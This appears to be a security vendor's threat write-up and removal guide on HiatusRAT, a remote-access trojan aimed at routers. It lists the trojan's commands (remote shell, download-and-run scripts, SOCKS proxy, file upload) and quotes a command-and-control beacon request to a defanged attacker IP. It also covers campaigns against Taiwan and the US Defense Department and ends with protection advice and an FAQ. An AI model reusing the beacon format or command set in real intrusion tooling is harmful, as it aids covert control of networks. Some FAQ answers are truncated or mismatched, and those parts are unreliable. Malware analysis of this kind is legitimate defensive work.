HiatusRAT Threat Analysis & Removal Guide

HiatusRAT, a notable malware since its emergence in 2021, exhibits a distinctive focus on network devices, particularly routers. Its capabilities span from packet analysis with a tailored tcpdump tool, to executing diverse commands received from a command server. By infecting routers, it reaches all the traffic that goes in and out the network.

HiatusRAT boasts versatile functionalities, including setting up SocksV5 proxies, file manipulation, remote shell generation, and self-destruct capabilities. Its agility in targeting routers underscores its potential to compromise and control network infrastructure with finesse. Most probably, it is backed by Chinese state-sponsored threat actors.

HiatusRAT Overview

Initially, I was looking at HiatusRAT from the perspective of its network architecture. Instead of infecting computers or servers, this RAT is injected into networking devices. This strategy has been in place since its emergence in late 2021. Rather than compromising individual computers within the network, HiatusRAT aims to control routers.

Such an approach may actually be even more effective, as routers serve as gateways for vast volumes of information. However, HiatusRAT doesn’t shy away from delivering supplementary payloads to the targeted systems. In addition to conducting network sniffing, these compromised router networks double as proxy servers. This duality effectively conceals the true IP address from the intended server.

Quasar RAT, DarkVision RAT, JanelaRAT

Name	HiatusRAT
Detection	HiatusRAT
Threat type	Remote-access Trojan
Damage	Parasites on networking equipment, sniffs all the network traffic, allows for malware injection.
Similar Behavior

As a payload propagation target, the attackers search for business-grade network routers with vulnerable firmware. Initially, the botnet targeted Draytek routers, specifically the Vigor 2960 and 3900 models. Those are outdated and apparently have some flaws in their software. As time passed, the malware evolved to infiltrate routers with chipsets founded on Arm, i386, x86-64, and MIPS/MIPS64 architectures. This expanded scope covers a significant array of devices. Notably, updates to network infrastructure firmware tend to be implemented even more cautiously than updates to regular software.

HiatusRAT Technical Analysis

The exact sequence for injecting the RAT into the router remains unclear. However, it’s evident that upon initial access, attackers run a batch script that downloads the payload and an auxiliary tcpdump tool, specialized for packet analysis.

Once activated, HiatusRAT immediately removes any competing processes on the 8816 port. If present, the malware halts one process and proceeds with its regular launch. The subsequent step involves gathering foundational information about the host device. This encompasses the MAC address, architecture, firmware, kernel versions, file system details, and potentially stored internal memory files.

With these checks complete, the malware references a compact JSON file, likely housing its configuration. Inside, the RAT acquires the C2 server addresses. Alongside the primary server, a secondary server receives packages from the modified tcpdump tool. The initial communication with the control server takes the form of a classic HTTP POST request. This request transmits several fields containing basic system data collected in the previous step.

Note

“POST /master/Api/active?uuid=005056c00001 HTTP/1.1”
Host: 104.250.48[.]192:443
Accept: */*
Content-Type: application/json
X_UTIME: 1674762549
X_UUID: 005056c00001
X_TOKEN: ffca0c6ca91ce7070c3e5e41d7c983a2

Functionality Review

Command	Description
Tcp_forward	Configures forwarding rules with designated IP and port configurations. These changes are applied to the router settings, resulting in the forwarding of TCP traffic through the specified port.
File	Specifies a file to be read, deleted, or uploaded on the infected host. This command provides guidance for managing files on the compromised device.
Script	Similar to the Executor command, this command downloads and runs a script from the C2 server. It plays a role in the malware’s delivery mechanism.
Shell	Generates a remote shell on the compromised router. This shell instance works in conjunction with the Execute and Script commands, collectively forming the malware delivery mechanism.
Socks5	Establishes a SocksV5 proxy on the compromised device. This proxy facilitates port forwarding and listening in accordance with RFC 1928.
Quit	A self-explanatory command that forces the malware to self-destruct, terminating all ongoing operations.
Executor	Issues commands to download and execute a file from the command server. This command effectively serves as a means to execute remote files.

Real-world applications

The continuous cyberattack targeting Taiwanese enterprises and a government entity first surfaced in August 2023. Researchers who had previously examined the HiatusRAT botnet, identified a fresh surge in connections emanating from Taiwanese IP address zones. Subsequently, a series of cyberattacks struck chemical production facilities, semiconductor manufacturers, and a municipal body were uncovered. They surely corelate, especially considering that key damage of these attacks was a huge data leak.

The scenario concerning the U.S. Department of Defence follows a different trajectory. The same research team detected incoming traffic to the botnet’s IP addresses, originating not only from Taiwan but also from the U.S. It was revealed that the malicious actors behind the RAT exploited a Tier 2 server to establish a link with the DoD server dedicated to defense contracts proposals. Thankfully, no substantial breach ensued, indicating hackers likely engaged in preliminary reconnaissance before potential future actions.

How to protect against HiatusRAT?

There are not much you can do against such a tricky malware once it is inside. Resetting the router is an option, but there is also a much more effective alternative. Moreover, there is also a need for a well-done anti-malware program – let me explain what for.

Ensure the regular updating or upgrading of your networking devices. Given that vulnerable router firmware is the prime target for malware injection, maintaining up-to-date firmware is crucial. Stay vigilant regarding malware attacks executed through networking device vulnerabilities. Typically, manufacturers release updates within weeks. However, in certain cases, aging devices may reach end-of-life status and cease to receive support. In such situations, opting for device replacement becomes the most effective and definitive strategy to eliminate potential hazards.

Frequently Asked Questions (FAQ)

My computer is infected with HiatusRAT malware, should I format my storage device to get rid of it?

Reformatting your storage device should only be considered as a last resort for removing HiatusRAT malware. Prior to taking such drastic action, it is advisable to perform a comprehensive scan using trustworthy antivirus or

What are the biggest issues that malware can cause?

Malware poses a significant risk to the security and privacy of sensitive information, potentially leading to identity theft, financial loss, and unauthorized access to personal accounts. Furthermore, it can disrupt the normal operation of a system, causing performance issues, system crashes, and data corruption.

What is the purpose of HiatusRAT?

The purpose of HiatusRAT is to enable remote access and control of compromised devices. It allows threat actors to perform various malicious activities, such as unauthorized access, data theft, system manipulation, and disabling security measures, potentially causing significant harm to individuals and organizations.

Will Gridinsoft Anti-Malware protect me from malware?

Nevertheless, it is crucial to recognize that sophisticated malware can remain hidden deep within the system. Consequently, conducting a complete system scan is imperative to detect and eradicate malware.